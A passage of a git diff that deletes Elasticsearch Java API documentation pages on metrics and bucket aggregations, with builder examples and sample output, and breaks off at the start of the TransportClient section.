a/docs/java-api/aggregations/bucket/nested-aggregation.asciidoc b/docs/java-api/aggregations/bucket/nested-aggregation.asciidoc deleted file mode 100644 index b1ebad7a63b..00000000000 --- a/docs/java-api/aggregations/bucket/nested-aggregation.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[java-aggs-bucket-nested]] -==== Nested Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-nested-aggregation.html[Nested Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders - .nested("agg", "resellers"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.nested.Nested; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Nested agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/range-aggregation.asciidoc b/docs/java-api/aggregations/bucket/range-aggregation.asciidoc deleted file mode 100644 index b30c856ebea..00000000000 --- a/docs/java-api/aggregations/bucket/range-aggregation.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[[java-aggs-bucket-range]] -==== Range Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-range-aggregation.html[Range Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .range("agg") - .field("height") - .addUnboundedTo(1.0f) // from -infinity to 1.0 (excluded) - .addRange(1.0f, 1.5f) // from 1.0 to 1.5 (excluded) - .addUnboundedFrom(1.5f); // from 1.5 to +infinity --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.range.Range; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Range agg = sr.getAggregations().get("agg"); - -// For each entry -for (Range.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // Range as key - Number from = (Number) entry.getFrom(); // Bucket from - Number to = (Number) entry.getTo(); // Bucket to - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], from [{}], to [{}], doc_count [{}]", key, from, to, docCount); -} --------------------------------------------------- - -This will basically produce for the first example: - -[source,text] --------------------------------------------------- -key [*-1.0], from [-Infinity], to [1.0], doc_count [9] -key [1.0-1.5], from [1.0], to [1.5], doc_count [21] -key [1.5-*], from [1.5], to [Infinity], doc_count [20] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/reverse-nested-aggregation.asciidoc b/docs/java-api/aggregations/bucket/reverse-nested-aggregation.asciidoc deleted file mode 100644 index 635b0e8cf77..00000000000 --- a/docs/java-api/aggregations/bucket/reverse-nested-aggregation.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ -[[java-aggs-bucket-reverse-nested]] -==== Reverse Nested Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-reverse-nested-aggregation.html[Reverse Nested Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .nested("agg", "resellers") - .subAggregation( - AggregationBuilders - .terms("name").field("resellers.name") - .subAggregation( - AggregationBuilders - .reverseNested("reseller_to_product") - ) - ); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.nested.Nested; -import org.elasticsearch.search.aggregations.bucket.nested.ReverseNested; -import org.elasticsearch.search.aggregations.bucket.terms.Terms; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Nested agg = sr.getAggregations().get("agg"); -Terms name = agg.getAggregations().get("name"); -for (Terms.Bucket bucket : name.getBuckets()) { - ReverseNested resellerToProduct = bucket.getAggregations().get("reseller_to_product"); - resellerToProduct.getDocCount(); // Doc count -} --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/significantterms-aggregation.asciidoc b/docs/java-api/aggregations/bucket/significantterms-aggregation.asciidoc deleted file mode 100644 index 4450c324c82..00000000000 --- a/docs/java-api/aggregations/bucket/significantterms-aggregation.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ -[[java-aggs-bucket-significantterms]] -==== Significant Terms Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-significantterms-aggregation.html[Significant Terms Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .significantTerms("significant_countries") - .field("address.country"); - -// Let say you search for men only -SearchResponse sr = client.prepareSearch() - .setQuery(QueryBuilders.termQuery("gender", "male")) - .addAggregation(aggregation) - .get(); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.significant.SignificantTerms; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -SignificantTerms agg = sr.getAggregations().get("significant_countries"); - -// For each entry -for (SignificantTerms.Bucket entry : agg.getBuckets()) { - entry.getKey(); // Term - entry.getDocCount(); // Doc count -} --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/terms-aggregation.asciidoc b/docs/java-api/aggregations/bucket/terms-aggregation.asciidoc deleted file mode 100644 index db584fd4ced..00000000000 --- a/docs/java-api/aggregations/bucket/terms-aggregation.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ -[[java-aggs-bucket-terms]] -==== Terms Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-terms-aggregation.html[Terms Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.terms.Terms; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Terms genders = sr.getAggregations().get("genders"); - -// For each entry -for (Terms.Bucket entry : genders.getBuckets()) { - entry.getKey(); // Term - entry.getDocCount(); // Doc count -} --------------------------------------------------- - -===== Order - -Import bucket ordering strategy classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.BucketOrder; --------------------------------------------------- - -Ordering the buckets by their `doc_count` in an ascending manner: - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender") - .order(BucketOrder.count(true)) --------------------------------------------------- - -Ordering the buckets alphabetically by their terms in an ascending manner: - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender") - .order(BucketOrder.key(true)) --------------------------------------------------- - -Ordering the buckets by single value metrics sub-aggregation (identified by the aggregation name): - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender") - .order(BucketOrder.aggregation("avg_height", false)) - .subAggregation( - AggregationBuilders.avg("avg_height").field("height") - ) --------------------------------------------------- - -Ordering the buckets by multiple criteria: - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender") - .order(BucketOrder.compound( // in order of priority: - BucketOrder.aggregation("avg_height", false), // sort by sub-aggregation first - BucketOrder.count(true))) // then bucket count as a tie-breaker - .subAggregation( - AggregationBuilders.avg("avg_height").field("height") - ) --------------------------------------------------- diff --git a/docs/java-api/aggregations/metrics.asciidoc b/docs/java-api/aggregations/metrics.asciidoc deleted file mode 100644 index c9afb4c39d4..00000000000 --- a/docs/java-api/aggregations/metrics.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[[java-aggregations-metrics]] - -include::metrics/min-aggregation.asciidoc[] - -include::metrics/max-aggregation.asciidoc[] - -include::metrics/sum-aggregation.asciidoc[] - -include::metrics/avg-aggregation.asciidoc[] - -include::metrics/stats-aggregation.asciidoc[] - -include::metrics/extendedstats-aggregation.asciidoc[] - -include::metrics/valuecount-aggregation.asciidoc[] - -include::metrics/percentile-aggregation.asciidoc[] - -include::metrics/percentile-rank-aggregation.asciidoc[] - -include::metrics/cardinality-aggregation.asciidoc[] - -include::metrics/geobounds-aggregation.asciidoc[] - -include::metrics/tophits-aggregation.asciidoc[] - -include::metrics/scripted-metric-aggregation.asciidoc[] diff --git a/docs/java-api/aggregations/metrics/avg-aggregation.asciidoc b/docs/java-api/aggregations/metrics/avg-aggregation.asciidoc deleted file mode 100644 index 511cbabf5c8..00000000000 --- a/docs/java-api/aggregations/metrics/avg-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-avg]] -==== Avg Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-avg-aggregation.html[Avg Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AvgAggregationBuilder aggregation = - AggregationBuilders - .avg("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.avg.Avg; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Avg agg = sr.getAggregations().get("agg"); -double value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/cardinality-aggregation.asciidoc b/docs/java-api/aggregations/metrics/cardinality-aggregation.asciidoc deleted file mode 100644 index 8a854e553f4..00000000000 --- a/docs/java-api/aggregations/metrics/cardinality-aggregation.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ -[[java-aggs-metrics-cardinality]] -==== Cardinality Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-cardinality-aggregation.html[Cardinality Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -CardinalityAggregationBuilder aggregation = - AggregationBuilders - .cardinality("agg") - .field("tags"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.cardinality.Cardinality; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Cardinality agg = sr.getAggregations().get("agg"); -long value = agg.getValue(); --------------------------------------------------- - - diff --git a/docs/java-api/aggregations/metrics/extendedstats-aggregation.asciidoc b/docs/java-api/aggregations/metrics/extendedstats-aggregation.asciidoc deleted file mode 100644 index 8f2f12ede68..00000000000 --- a/docs/java-api/aggregations/metrics/extendedstats-aggregation.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[java-aggs-metrics-extendedstats]] -==== Extended Stats Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-extendedstats-aggregation.html[Extended Stats Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -ExtendedStatsAggregationBuilder aggregation = - AggregationBuilders - .extendedStats("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.stats.extended.ExtendedStats; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -ExtendedStats agg = sr.getAggregations().get("agg"); -double min = agg.getMin(); -double max = agg.getMax(); -double avg = agg.getAvg(); -double sum = agg.getSum(); -long count = agg.getCount(); -double stdDeviation = agg.getStdDeviation(); -double sumOfSquares = agg.getSumOfSquares(); -double variance = agg.getVariance(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/geobounds-aggregation.asciidoc b/docs/java-api/aggregations/metrics/geobounds-aggregation.asciidoc deleted file mode 100644 index 571a61f12e7..00000000000 --- a/docs/java-api/aggregations/metrics/geobounds-aggregation.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[java-aggs-metrics-geobounds]] -==== Geo Bounds Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-geobounds-aggregation.html[Geo Bounds Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -GeoBoundsAggregationBuilder aggregation = - GeoBoundsAggregationBuilder - .geoBounds("agg") - .field("address.location") - .wrapLongitude(true); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.geobounds.GeoBounds; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -GeoBounds agg = sr.getAggregations().get("agg"); -GeoPoint bottomRight = agg.bottomRight(); -GeoPoint topLeft = agg.topLeft(); -logger.info("bottomRight {}, topLeft {}", bottomRight, topLeft); --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -bottomRight [40.70500764381921, 13.952946866893775], topLeft [53.49603022435221, -4.190029308156676] --------------------------------------------------- diff --git a/docs/java-api/aggregations/metrics/max-aggregation.asciidoc b/docs/java-api/aggregations/metrics/max-aggregation.asciidoc deleted file mode 100644 index 9bd39369842..00000000000 --- a/docs/java-api/aggregations/metrics/max-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-max]] -==== Max Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-max-aggregation.html[Max Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -MaxAggregationBuilder aggregation = - AggregationBuilders - .max("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.max.Max; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Max agg = sr.getAggregations().get("agg"); -double value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/min-aggregation.asciidoc b/docs/java-api/aggregations/metrics/min-aggregation.asciidoc deleted file mode 100644 index 0205cae44d8..00000000000 --- a/docs/java-api/aggregations/metrics/min-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-min]] -==== Min Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-min-aggregation.html[Min Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -MinAggregationBuilder aggregation = - AggregationBuilders - .min("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.min.Min; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Min agg = sr.getAggregations().get("agg"); -double value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/percentile-aggregation.asciidoc b/docs/java-api/aggregations/metrics/percentile-aggregation.asciidoc deleted file mode 100644 index ad54fbf5a46..00000000000 --- a/docs/java-api/aggregations/metrics/percentile-aggregation.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[[java-aggs-metrics-percentile]] -==== Percentile Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-percentile-aggregation.html[Percentile Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -PercentilesAggregationBuilder aggregation = - AggregationBuilders - .percentiles("agg") - .field("height"); --------------------------------------------------- - -You can provide your own percentiles instead of using defaults: - -[source,java] --------------------------------------------------- -PercentilesAggregationBuilder aggregation = - AggregationBuilders - .percentiles("agg") - .field("height") - .percentiles(1.0, 5.0, 10.0, 20.0, 30.0, 75.0, 95.0, 99.0); --------------------------------------------------- - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.percentiles.Percentile; -import org.elasticsearch.search.aggregations.metrics.percentiles.Percentiles; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Percentiles agg = sr.getAggregations().get("agg"); -// For each entry -for (Percentile entry : agg) { - double percent = entry.getPercent(); // Percent - double value = entry.getValue(); // Value - - logger.info("percent [{}], value [{}]", percent, value); -} --------------------------------------------------- - - -This will basically produce for the first example: - -[source,text] --------------------------------------------------- -percent [1.0], value [0.814338896154595] -percent [5.0], value [0.8761912455821302] -percent [25.0], value [1.173346540141847] -percent [50.0], value [1.5432023318692198] -percent [75.0], value [1.923915462033674] -percent [95.0], value [2.2273644908535335] -percent [99.0], value [2.284989339108279] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/percentile-rank-aggregation.asciidoc b/docs/java-api/aggregations/metrics/percentile-rank-aggregation.asciidoc deleted file mode 100644 index a846d59f820..00000000000 --- a/docs/java-api/aggregations/metrics/percentile-rank-aggregation.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -[[java-aggs-metrics-percentile-rank]] -==== Percentile Ranks Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-percentile-rank-aggregation.html[Percentile Ranks Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -PercentileRanksAggregationBuilder aggregation = - AggregationBuilders - .percentileRanks("agg") - .field("height") - .values(1.24, 1.91, 2.22); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.percentiles.Percentile; -import org.elasticsearch.search.aggregations.metrics.percentiles.PercentileRanks; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -PercentileRanks agg = sr.getAggregations().get("agg"); -// For each entry -for (Percentile entry : agg) { - double percent = entry.getPercent(); // Percent - double value = entry.getValue(); // Value - - logger.info("percent [{}], value [{}]", percent, value); -} --------------------------------------------------- - - -This will basically produce: - -[source,text] --------------------------------------------------- -percent [29.664353095090945], value [1.24] -percent [73.9335313461868], value [1.91] -percent [94.40095147327283], value [2.22] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/scripted-metric-aggregation.asciidoc b/docs/java-api/aggregations/metrics/scripted-metric-aggregation.asciidoc deleted file mode 100644 index 5b68fa7be45..00000000000 --- a/docs/java-api/aggregations/metrics/scripted-metric-aggregation.asciidoc +++ /dev/null @@ -1,100 +0,0 @@ -[[java-aggs-metrics-scripted-metric]] -==== Scripted Metric Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Scripted Metric Aggregation] -with Java API. - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -ScriptedMetricAggregationBuilder aggregation = AggregationBuilders - .scriptedMetric("agg") - .initScript(new Script("state.heights = []")) - .mapScript(new Script("state.heights.add(doc.gender.value == 'male' ? doc.height.value : -1.0 * doc.height.value)")); --------------------------------------------------- - -You can also specify a `combine` script which will be executed on each shard: - -[source,java] --------------------------------------------------- -ScriptedMetricAggregationBuilder aggregation = AggregationBuilders - .scriptedMetric("agg") - .initScript(new Script("state.heights = []")) - .mapScript(new Script("state.heights.add(doc.gender.value == 'male' ? doc.height.value : -1.0 * doc.height.value)")) - .combineScript(new Script("double heights_sum = 0.0; for (t in state.heights) { heights_sum += t } return heights_sum")); --------------------------------------------------- - -You can also specify a `reduce` script which will be executed on the node which gets the request: - -[source,java] --------------------------------------------------- -ScriptedMetricAggregationBuilder aggregation = AggregationBuilders - .scriptedMetric("agg") - .initScript(new Script("state.heights = []")) - .mapScript(new Script("state.heights.add(doc.gender.value == 'male' ? doc.height.value : -1.0 * doc.height.value)")) - .combineScript(new Script("double heights_sum = 0.0; for (t in state.heights) { heights_sum += t } return heights_sum")) - .reduceScript(new Script("double heights_sum = 0.0; for (a in states) { heights_sum += a } return heights_sum")); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.terms.Terms; -import org.elasticsearch.search.aggregations.metrics.tophits.TopHits; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -ScriptedMetric agg = sr.getAggregations().get("agg"); -Object scriptedResult = agg.aggregation(); -logger.info("scriptedResult [{}]", scriptedResult); --------------------------------------------------- - -Note that the result depends on the script you built. -For the first example, this will basically produce: - -[source,text] --------------------------------------------------- -scriptedResult object [ArrayList] -scriptedResult [ { -"heights" : [ 1.122218480146643, -1.8148918111233887, -1.7626731575142909, ... ] -}, { -"heights" : [ -0.8046067304119863, -2.0785486707864553, -1.9183567430207953, ... ] -}, { -"heights" : [ 2.092635728868694, 1.5697545960886536, 1.8826954461968808, ... ] -}, { -"heights" : [ -2.1863201099468403, 1.6328549117346856, -1.7078288405893842, ... ] -}, { -"heights" : [ 1.6043904836424177, -2.0736538674414025, 0.9898266674373053, ... ] -} ] --------------------------------------------------- - -The second example will produce: - -[source,text] --------------------------------------------------- -scriptedResult object [ArrayList] -scriptedResult [-41.279615707402876, - -60.88007362339038, - 38.823270659734256, - 14.840192739445632, - 11.300902755741326] --------------------------------------------------- - -The last example will produce: - -[source,text] --------------------------------------------------- -scriptedResult object [Double] -scriptedResult [2.171917696507009] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/stats-aggregation.asciidoc b/docs/java-api/aggregations/metrics/stats-aggregation.asciidoc deleted file mode 100644 index 260d9c01cb9..00000000000 --- a/docs/java-api/aggregations/metrics/stats-aggregation.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[[java-aggs-metrics-stats]] -==== Stats Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-stats-aggregation.html[Stats Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -StatsAggregationBuilder aggregation = - AggregationBuilders - .stats("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.stats.Stats; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Stats agg = sr.getAggregations().get("agg"); -double min = agg.getMin(); -double max = agg.getMax(); -double avg = agg.getAvg(); -double sum = agg.getSum(); -long count = agg.getCount(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/sum-aggregation.asciidoc b/docs/java-api/aggregations/metrics/sum-aggregation.asciidoc deleted file mode 100644 index 453616916d7..00000000000 --- a/docs/java-api/aggregations/metrics/sum-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-sum]] -==== Sum Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-sum-aggregation.html[Sum Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -SumAggregationBuilder aggregation = - AggregationBuilders - .sum("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.sum.Sum; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Sum agg = sr.getAggregations().get("agg"); -double value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/tophits-aggregation.asciidoc b/docs/java-api/aggregations/metrics/tophits-aggregation.asciidoc deleted file mode 100644 index 2473b4b89d7..00000000000 --- a/docs/java-api/aggregations/metrics/tophits-aggregation.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[[java-aggs-metrics-tophits]] -==== Top Hits Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-top-hits-aggregation.html[Top Hits Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .terms("agg").field("gender") - .subAggregation( - AggregationBuilders.topHits("top") - ); --------------------------------------------------- - -You can use most of the options available for standard search such as `from`, `size`, `sort`, `highlight`, `explain`... - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .terms("agg").field("gender") - .subAggregation( - AggregationBuilders.topHits("top") - .explain(true) - .size(1) - .from(10) - ); --------------------------------------------------- - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.terms.Terms; -import org.elasticsearch.search.aggregations.metrics.tophits.TopHits; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Terms agg = sr.getAggregations().get("agg"); - -// For each entry -for (Terms.Bucket entry : agg.getBuckets()) { - String key = entry.getKey(); // bucket key - long docCount = entry.getDocCount(); // Doc count - logger.info("key [{}], doc_count [{}]", key, docCount); - - // We ask for top_hits for each bucket - TopHits topHits = entry.getAggregations().get("top"); - for (SearchHit hit : topHits.getHits().getHits()) { - logger.info(" -> id [{}], _source [{}]", hit.getId(), hit.getSourceAsString()); - } -} --------------------------------------------------- - -This will basically produce for the first example: - -[source,text] --------------------------------------------------- -key [male], doc_count [5107] - -> id [AUnzSZze9k7PKXtq04x2], _source [{"gender":"male",...}] - -> id [AUnzSZzj9k7PKXtq04x4], _source [{"gender":"male",...}] - -> id [AUnzSZzl9k7PKXtq04x5], _source [{"gender":"male",...}] -key [female], doc_count [4893] - -> id [AUnzSZzM9k7PKXtq04xy], _source [{"gender":"female",...}] - -> id [AUnzSZzp9k7PKXtq04x8], _source [{"gender":"female",...}] - -> id [AUnzSZ0W9k7PKXtq04yS], _source [{"gender":"female",...}] --------------------------------------------------- diff --git a/docs/java-api/aggregations/metrics/valuecount-aggregation.asciidoc b/docs/java-api/aggregations/metrics/valuecount-aggregation.asciidoc deleted file mode 100644 index b180d22af33..00000000000 --- a/docs/java-api/aggregations/metrics/valuecount-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-valuecount]] -==== Value Count Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-valuecount-aggregation.html[Value Count Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -ValueCountAggregationBuilder aggregation = - AggregationBuilders - .count("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.valuecount.ValueCount; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -ValueCount agg = sr.getAggregations().get("agg"); -long value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggs.asciidoc b/docs/java-api/aggs.asciidoc deleted file mode 100644 index c2e09b4901e..00000000000 --- a/docs/java-api/aggs.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[[java-aggs]] -== Aggregations - -Elasticsearch provides a full Java API to play with aggregations. See the -{ref}/search-aggregations.html[Aggregations guide]. - -Use the factory for aggregation builders (`AggregationBuilders`) and add each aggregation -you want to compute when querying and add it to your search request: - -[source,java] --------------------------------------------------- -SearchResponse sr = node.client().prepareSearch() - .setQuery( /* your query */ ) - .addAggregation( /* add an aggregation */ ) - .execute().actionGet(); --------------------------------------------------- - -Note that you can add more than one aggregation. See -{ref}/search-search.html[Search Java API] for details. - -To build aggregation requests, use `AggregationBuilders` helpers. Just import them -in your class: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.AggregationBuilders; --------------------------------------------------- - -=== Structuring aggregations - -As explained in the -{ref}/search-aggregations.html[Aggregations guide], you can define -sub aggregations inside an aggregation. - -An aggregation could be a metrics aggregation or a bucket aggregation. - -For example, here is a 3 levels aggregation composed of: - -* Terms aggregation (bucket) -* Date Histogram aggregation (bucket) -* Average aggregation (metric) - -[source,java] --------------------------------------------------- -SearchResponse sr = node.client().prepareSearch() - .addAggregation( - AggregationBuilders.terms("by_country").field("country") - .subAggregation(AggregationBuilders.dateHistogram("by_year") - .field("dateOfBirth") - .calendarInterval(DateHistogramInterval.YEAR) - .subAggregation(AggregationBuilders.avg("avg_children").field("children")) - ) - ) - .execute().actionGet(); --------------------------------------------------- - -=== Metrics aggregations - -include::aggregations/metrics.asciidoc[] - -=== Bucket aggregations - -include::aggregations/bucket.asciidoc[] diff --git a/docs/java-api/client.asciidoc b/docs/java-api/client.asciidoc deleted file mode 100644 index 811d7c398d9..00000000000 --- a/docs/java-api/client.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[[client]] -== Client - -You can use the *Java client* in multiple ways: - -* Perform standard <>, <>, - <> and <> operations on an - existing cluster -* Perform administrative tasks on a running cluster - -Obtaining an Elasticsearch `Client` is simple. The most common way to -get a client is by creating a <> -that connects to a cluster. - -[IMPORTANT] -============================== - -The client must have the same major version (e.g. `2.x`, or `5.x`) as the -nodes in the cluster. Clients may connect to clusters which have a different -minor version (e.g. `2.3.x`) but it is possible that new functionality may not -be supported. Ideally, the client should have the same version as the -cluster. - -============================== - -[[transport-client]] -=== Transport Client - -deprecated[7.0.0, The `TransportClient` is deprecated in favour of the {java-rest}/java-rest-high.html[Java High Level REST Client] and will be removed in Elasticsearch 8.0. The {java-rest}/java-rest-high-level-migration.html[migration guide] describes all the steps needed to migrate.] - -The `TransportClient` connects remotely to an Elasticsearch cluster -using the transport module. It does not join the cluster, but simply -gets one or more initial transport addresses and communicates with them -in round robin fashion on each action (though most actions will probably -be "two hop" operations). - -[source,java] --------------------------------------------------- -// on startup - -TransportClient client = new PreBuiltTransportClient(Settings.EMPTY) - .addTransportAddress(new TransportAddress(InetAddress.getByName("host1"), 